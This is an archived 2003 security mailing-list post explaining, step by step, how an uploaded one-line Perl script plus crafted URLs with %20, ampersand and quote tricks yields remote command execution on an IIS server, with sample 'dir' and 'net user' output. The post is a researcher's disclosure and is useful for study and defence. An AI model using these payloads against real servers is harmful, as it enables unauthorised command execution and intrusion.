The Building Of An Exploit String

From: Brett Moore (brett@softwarecreations.co.nz)
Date: Wed Feb 26 2003 - 21:01:04 EST


*********************************************
The Building Of An Exploit String
- Exploiting The PERL Under IIS
*********************************************
PERL v5.6.1 built for MSWin32-x86
*http://www.perl.com/
*http://www.activestate.com

The problems highlighted in this writeup are not directly related to the use
of perl but highlight some of the possibilities when problems with file
uploading and directory permissions are abused.
It is highly possible that these techniques could be used against other
command
line interpreters.

I recently audited a package that used the perl.exe interpreter on a windows
2000 server running IIS5.

Under application configuration in the IIS management console, the .cgi
extension
is mapped as: c:/APP/perl/bin/perl.exe %s

This allows us access to the perl executable through the use of a cgi
extension.

example: *http://192.168.1.1/web/test.cgi
returns: Can't open perl script "C:\APP\web\test.cgi": No such file or
directory

This is obviously a path disclosure issue.

All attempts to pass parameters to perl.exe fail.

example: *http://192.168.1.1/web/-h.cgi
result: Can't open perl script "C:\APP\web\-h.cgi": No such file or
directory

It seems that IIS is passing the full path to the interpreter.

So what we required was the ability to create a file on the server and then
pass
that file to the perl interpreter.

This particular application allowed uploading of files with a .bmp extension
so
we created a small perl script
        system(@ARGV);

and uploaded it as system.bmp. This file was uploaded to the folder
        c:/APP/web/data/

IIS will only pass the file to the perl interpreter if it has a cgi
extension,
which our uploaded file doesn't have.

example: *http://192.168.1.1/web/data/system.bmp.cgi
result: Can't open perl script "C:\APP\web\data\system.bmp.cgi":
        No such file or directory

By placing a %20 (space) or %09 (tab) between the .bmp and the .cgi we are
able to force the interpreter to execute our script.

example: *http://192.168.1.1/web/data/system.bmp%20.cgi
result: '.cgi' is not recognized as an internal or external command,
         operable program or batch file.

The system command inside our uploaded file is executing and using the
.cgi as the argv parameter.

Any arguments placed before the %20.cgi will be used by our system call.

example: *http://192.168.1.1/web/data/system.bmp%20dir%20.cgi
result: This will result in a request to open or save to disk

Appending a ? to the end of the url will prevent the open/save to disk
request.

example: *http://192.168.1.1/web/data/system.bmp%20dir%20.cgi?
result: Directory of C:\APP\web
         File Not Found

This results in a File Not Found message because our script is running
        system("dir .cgi?")

This is easily avoided by inserting an & (ampersand) character after the
last argument and before the %20.cgi

example: *http://192.168.1.1/web/data/system.bmp%20dir%20&%20.cgi?
result:
        Directory of C:\APP\web

        02/12/2003 09:21a <DIR> .
        02/12/2003 09:21a <DIR> ..
        02/12/2003 01:35a 15 a.pl
        02/12/2003 12:36a <DIR> bin
        02/12/2003 12:36a 206 default.htm
        etc..
              10 File(s) 17,165 bytes
               6 Dir(s) 52,390,678,528 bytes free
        '.cgi' is not recognized as an internal or external command,
        operable program or batch file.

Which will now run as system("dir & .cgi?") which are interpreted by cmd.exe
as
two seperate dos commands.

This will not work when attempting to run executable files.

example: *http://192.168.1.1/web/data/system.bmp%20net%20user%20&%20%20.cgi?
result: More help is available by typing NET HELPMSG 2221.

example: *http://192.168.1.1/web/data/system.bmp%20net%20use%20&%20%20.cgi?
result: The network name cannot be found.

This is caused by cmd.exe interpreting the 'user & .cgi' part of the
string as the parameter to pass to 'net.exe'. This results in a call to
 "net user & .cgi" which is invalid.

By placing " (double quotes) around our net.exe call we can modify the way
that cmd.exe will interpret the string.

example:
*http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20%20.cgi?
result: ------------------------------------------------------------
        Administrator Guest IUSR_BLACKHOLE
        IWAM_BLACKHOLE NetShowServices TsInternetUser
        VUSR_BLACKHOLE
        The command completed with one or more errors.

        '.cgi' is not recognized as an internal or external command,
        operable program or batch file.

The '.cgi' error is still been shown here as it is still been interpreted.
By adding a final command and redirecting its output to a writable file
space
we can have this error removed.

example:
*http://192.168.1.1/web/data/system.bmp%20"net%20user"%20&%20dir%20>%20\a.cg
i?
result: ------------------------------------------------------------
        Administrator Guest IUSR_BLACKHOLE
        IWAM_BLACKHOLE NetShowServices TsInternetUser
        VUSR_BLACKHOLE
        The command completed with one or more errors.

..

----------------------------------------------------------------------------
<Pre>Do you know the base address of the Global Offset Table (GOT) on a Solaris 8 box?
CORE IMPACT does.</Pre>
<A href="http://www.securityfocus.com/core"> http://www.securityfocus.com/core>



This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:29 EDT